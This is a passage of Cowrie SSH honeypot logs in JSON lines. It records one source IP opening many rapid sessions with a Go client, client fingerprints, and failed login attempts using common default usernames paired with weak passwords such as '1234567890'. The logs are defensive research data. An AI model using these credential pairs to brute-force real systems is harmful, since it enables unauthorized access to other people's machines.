{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35060,"dst_ip":"1.2.3.4","dst_port":22,"session":"06baba5b7012","protocol":"ssh","message":"New connection: 87.120.191.13:35060 (1.2.3.4:22) [session: 06baba5b7012]","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.478127Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.500361Z","src_ip":"87.120.191.13","session":"cf4fced868f1"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.503698Z","src_ip":"87.120.191.13","session":"cf4fced868f1"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.513213Z","src_ip":"87.120.191.13","session":"32af80ac2a7e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.513961Z","src_ip":"87.120.191.13","session":"32af80ac2a7e"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"1234567890","message":"login attempt [ftpuser/1234567890] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.520344Z","src_ip":"87.120.191.13","session":"de031eb0e650"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.522105Z","src_ip":"87.120.191.13","session":"06baba5b7012"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.522889Z","src_ip":"87.120.191.13","session":"06baba5b7012"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.647038Z","src_ip":"87.120.191.13","session":"23b25ba0c23f"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35074,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4b09f31a644","protocol":"ssh","message":"New connection: 87.120.191.13:35074 (1.2.3.4:22) [session: a4b09f31a644]","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.671489Z"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.723989Z","src_ip":"87.120.191.13","session":"c7c1ab5f018b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.729399Z","src_ip":"87.120.191.13","session":"a4b09f31a644"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.730417Z","src_ip":"87.120.191.13","session":"a4b09f31a644"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35078,"dst_ip":"1.2.3.4","dst_port":22,"session":"f58b3452af99","protocol":"ssh","message":"New connection: 87.120.191.13:35078 (1.2.3.4:22) [session: f58b3452af99]","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.747603Z"}
{"eventid":"cowrie.login.failed","username":"student","password":"1234567890","message":"login attempt [student/1234567890] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.801801Z","src_ip":"87.120.191.13","session":"06baba5b7012"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.810007Z","src_ip":"87.120.191.13","session":"f58b3452af99"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.811353Z","src_ip":"87.120.191.13","session":"f58b3452af99"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"1234567890","message":"login attempt [ubnt/1234567890] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.826715Z","src_ip":"87.120.191.13","session":"cf4fced868f1"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"1234567890","message":"login attempt [ftpuser/1234567890] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:44.830193Z","src_ip":"87.120.191.13","session":"32af80ac2a7e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:45.032798Z","src_ip":"87.120.191.13","session":"f10a2d251945"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35088,"dst_ip":"1.2.3.4","dst_port":22,"session":"d992c74026c9","protocol":"ssh","message":"New connection: 87.120.191.13:35088 (1.2.3.4:22) [session: d992c74026c9]","sensor":"my-vps","timestamp":"2025-08-26T01:53:45.069189Z"}
{"eventid":"cowrie.login.failed","username":"noc","password":"1234567890","message":"login attempt [noc/1234567890] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:45.085489Z","src_ip":"87.120.191.13","session":"a4b09f31a644"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:45.138463Z","src_ip":"87.120.191.13","session":"d992c74026c9"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:45.139155Z","src_ip":"87.120.191.13","session":"d992c74026c9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234567890","message":"login attempt [admin/1234567890] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:45.152584Z","src_ip":"87.120.191.13","session":"f58b3452af99"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1234567890","message":"login attempt [pi/1234567890] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:45.467338Z","src_ip":"87.120.191.13","session":"d992c74026c9"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:45.634998Z","src_ip":"87.120.191.13","session":"de031eb0e650"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35096,"dst_ip":"1.2.3.4","dst_port":22,"session":"f63c290c718f","protocol":"ssh","message":"New connection: 87.120.191.13:35096 (1.2.3.4:22) [session: f63c290c718f]","sensor":"my-vps","timestamp":"2025-08-26T01:53:45.668237Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:45.760628Z","src_ip":"87.120.191.13","session":"f63c290c718f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:45.762076Z","src_ip":"87.120.191.13","session":"f63c290c718f"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:45.914448Z","src_ip":"87.120.191.13","session":"06baba5b7012"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35104,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2a61d330f0a","protocol":"ssh","message":"New connection: 87.120.191.13:35104 (1.2.3.4:22) [session: d2a61d330f0a]","sensor":"my-vps","timestamp":"2025-08-26T01:53:45.933501Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:45.955909Z","src_ip":"87.120.191.13","session":"cf4fced868f1"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:45.962165Z","src_ip":"87.120.191.13","session":"32af80ac2a7e"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35114,"dst_ip":"1.2.3.4","dst_port":22,"session":"2602fd613b81","protocol":"ssh","message":"New connection: 87.120.191.13:35114 (1.2.3.4:22) [session: 2602fd613b81]","sensor":"my-vps","timestamp":"2025-08-26T01:53:45.983675Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35116,"dst_ip":"1.2.3.4","dst_port":22,"session":"c217c72170da","protocol":"ssh","message":"New connection: 87.120.191.13:35116 (1.2.3.4:22) [session: c217c72170da]","sensor":"my-vps","timestamp":"2025-08-26T01:53:45.993396Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:46.037216Z","src_ip":"87.120.191.13","session":"d2a61d330f0a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:46.037833Z","src_ip":"87.120.191.13","session":"d2a61d330f0a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:46.070629Z","src_ip":"87.120.191.13","session":"2602fd613b81"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:46.071185Z","src_ip":"87.120.191.13","session":"2602fd613b81"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:46.090580Z","src_ip":"87.120.191.13","session":"c217c72170da"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:46.091109Z","src_ip":"87.120.191.13","session":"c217c72170da"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:46.193521Z","src_ip":"87.120.191.13","session":"a4b09f31a644"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"cancel","message":"login attempt [ftpuser/cancel] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:46.219821Z","src_ip":"87.120.191.13","session":"f63c290c718f"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35126,"dst_ip":"1.2.3.4","dst_port":22,"session":"3891814ba55c","protocol":"ssh","message":"New connection: 87.120.191.13:35126 (1.2.3.4:22) [session: 3891814ba55c]","sensor":"my-vps","timestamp":"2025-08-26T01:53:46.234429Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:46.263154Z","src_ip":"87.120.191.13","session":"f58b3452af99"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":35130,"dst_ip":"1.2.3.4","dst_port":22,"session":"5217c66aa9b4","protocol":"ssh","message":"New connection: 87.120.191.13:35130 (1.2.3.4:22) [session: 5217c66aa9b4]","sensor":"my-vps","timestamp":"2025-08-26T01:53:46.300257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:46.313394Z","src_ip":"87.120.191.13","session":"3891814ba55c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-ni